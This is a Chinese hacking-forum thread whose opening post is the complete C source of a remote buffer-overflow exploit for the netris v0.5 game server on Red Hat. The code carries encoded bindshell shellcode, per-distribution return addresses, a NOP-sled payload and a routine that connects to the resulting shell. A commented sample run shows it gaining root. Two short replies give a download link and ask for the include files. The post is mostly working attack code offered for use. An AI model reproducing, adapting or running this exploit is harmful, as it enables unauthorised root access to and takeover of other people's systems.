|
 | 作者: syse [syse]
 论坛用户 |
登录 |
| /*********************************************************************************\ * [ netris[v0.5]:server remote buffer overflow exploit(new: all redhat os). * by jsk from Ph4nt0m Security Team * jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m) * Greets vade79 and all #ph4nt0m members * [root@localhost tmp]# ./pst-netex -h 127.0.0.1 -p 9284 -t 2 * * netris[v0.5]:server remote buffer overflow exploit(new) * by jsk. * Greets vade79 and all #ph4nt0m . * [+] Hostname: 127.0.0.1 * [+] Port num: 9284 * [+] Retaddr address: 0x8051444 * [1] #1 Set codes. * [1] #1 Set socket. *[*] attempting to connect: 127.0.0.1:9284. *[*] successfully connected: 127.0.0.1:9284. * [1] #1 Send codes. * [1] #3 Get shell. *[*] checking to see if the exploit was successful. *[*] attempting to connect: 127.0.0.1:45295. *[*] successfully connected: 127.0.0.1:45295. * *Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 *i686 i386 GNU/Linux *uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 (di \*********************************************************************************/ #include <stdio.h> #include <signal.h> #include <unistd.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #define BUFSIZE 12800 #define D_PORT 9284 #define D_HOST "www.ph4nt0m.net" #define TIMEOUT 10 static char shell[]= /* bindshell(45295)&, netric/S-poly. */ "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75" "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26" "\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95" "\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28" "\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda" "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e" "\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06" "\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0" "\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95" "\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16" "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e" "\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55" "\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e"; struct op_plat_st { int op_plat_num; char *op_plat_sys; u_long retaddr; int off_st; }; struct op_plat_st __pl_form[]= { {0,"red 7.1",0x08051e20+2116,0}, {1,"red 7.2(cmp)",0x08051d60+2116,0}, {2,"red 8.0 (Compile)",0x08050c00+2116,0}, {3,"red 9.0 (Compile)",0x08058d8c+2116,0}, }; void banrl(); void x_fp_rm_usage(char *x_fp_rm); unsigned short sock_connect(char *,unsigned short); void getshell(char *,unsigned short); void printe(char *,short); void sig_alarm(){printe("alarm/timeout hit.",1);} void banrl() { fprintf(stdout,"\n netris[v0.5]:server remote buffer overflow exploit(new)\n"); fprintf(stdout," by jsk.\n"); fprintf(stdout," Greets vade79 and all #ph4nt0m .\n"); } void x_fp_rm_usage(char *x_fp_rm) { int __t_xmp=0; fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm); fprintf(stdout,"\t -h [hostname] - target host.\n"); fprintf(stdout,"\t -p [port] - port number.\n"); fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n"); fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm); fprintf(stdout," Select target number>\n\n"); for(;;) { if(__pl_form[__t_xmp].op_plat_num==(0x82)) break; else { fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys); } __t_xmp++; } fprintf(stdout,"\n"); exit(0); } int main(int argc,char *argv[]) { int port=D_PORT; char hostname[0x333]=D_HOST; int whlp,type=0; unsigned int i=0; char *buf; int sd; u_long retaddr=__pl_form[type].retaddr; (void)banrl(); while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) { extern char *optarg; switch(whlp) { case 'T': case 't': if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; } else (void)x_fp_rm_usage(argv[0]); break; case 'H': case 'h': memset((char *)hostname,0,sizeof(hostname)); strncpy(hostname,optarg,sizeof(hostname)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'I': case 'i': fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); exit(-1); case '?': (void)x_fp_rm_usage(argv[0]); break; } } if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); } { fprintf(stdout," [+] Hostname: %s\n",hostname); fprintf(stdout," [+] Port num: %d\n",port); fprintf(stdout," [+] Retaddr address: %p\n",retaddr); } fprintf(stdout," [1] #1 Set codes.\n"); if(!(buf=(char *)malloc(BUFSIZE+1))) printe("getcode(): allocating memory failed.",1); for(i=0;i<BUFSIZE;i+=4){*(long *)&buf[i]=retaddr;} memset(buf,0x78,68); memset(buf+68,0x90,4096); memcpy(buf+68+4096,shell,strlen(shell)); fprintf(stdout," [1] #1 Set socket.\n"); sd=sock_connect(hostname,port); fprintf(stdout," [1] #1 Send codes.\n"); write(sd,buf,BUFSIZE); close(sd); sleep(1); fprintf(stdout," [1] #3 Get shell.\n"); getshell(hostname,5074); exit(0); } unsigned short sock_connect(char *hostname, unsigned short port){ int sock; struct hostent *t; struct sockaddr_in s; sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); s.sin_family=AF_INET; s.sin_port=htons(port); printf("[*] attempting to connect: %s:%d.\n",hostname,port); if((s.sin_addr.s_addr=inet_addr(hostname))){ if(!(t=gethostbyname(hostname))) printe("couldn't resolve hostname.",1); memcpy((char*)&s.sin_addr,(char*)t->h_addr, sizeof(s.sin_addr)); } signal(SIGALRM,sig_alarm); alarm(TIMEOUT); if(connect(sock,(struct sockaddr *)&s,sizeof(s))) printe("netris connection failed.",1); alarm(0); printf("[*] successfully connected: %s:%d.\n",hostname,port); return(sock); } void getshell(char *hostname,unsigned short port){ int sock,r; fd_set fds; char buf[4096+1]; struct hostent *he; struct sockaddr_in sa; printf("[*] checking to see if the exploit was successful.\n"); if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) printe("getshell(): socket() failed.",1); sa.sin_family=AF_INET; if((sa.sin_addr.s_addr=inet_addr(hostname))){ if(!(he=gethostbyname(hostname))) printe("getshell(): couldn't resolve.",1); memcpy((char *)&sa.sin_addr,(char *)he->h_addr, sizeof(sa.sin_addr)); } sa.sin_port=htons(port); signal(SIGALRM,sig_alarm); alarm(TIMEOUT); printf("[*] attempting to connect: %s:%d.\n",hostname,port); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){ printf("[!] connection failed: %s:%d.\n",hostname,port); return; } alarm(0); printf("[*] successfully connected: %s:%d.\n\n",hostname,port); signal(SIGINT,SIG_IGN); write(sock,"uname -a;id\n",13); while(1){ FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sock,&fds); if(select(sock+1,&fds,0,0,0)<1) printe("getshell(): select() failed.",1); if(FD_ISSET(0,&fds)){ if((r=read(0,buf,4096))<1) printe("getshell(): read() failed.",1); if(write(sock,buf,r)!=r) printe("getshell(): write() failed.",1); } if(FD_ISSET(sock,&fds)){ if((r=read(sock,buf,4096))<1) exit(0); write(1,buf,r); } } close(sock); return; } void printe(char *err,short e){ fprintf(stdout," [-] Failed.\n\n"); fprintf(stdout," Happy Exploit ! :-)\n\n"); if(e) exit(1); return; } |
| 地主 发表时间: 08/26 11:42 |
 | 回复: acheron [acheron]  论坛用户 |
登录 |
|
给出相关地址: http://www.xfocus.net/tools/200308/pst-netirsex.c.c 请流云给出注释啊,浪费我时间 [此贴被 黄泉(acheron) 在 08月27日10时25分 编辑过] |
| B1层 发表时间: 08/27 10:07 |
 | 回复: lovexp [lovexp]  论坛用户 |
登录 |
|
我想最好把上面的包含文件的地址最好也放出来吧! 要不全是白搭! |
| B2层 发表时间: 08/27 16:43 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 一个用C语言写的小攻击程序的代码!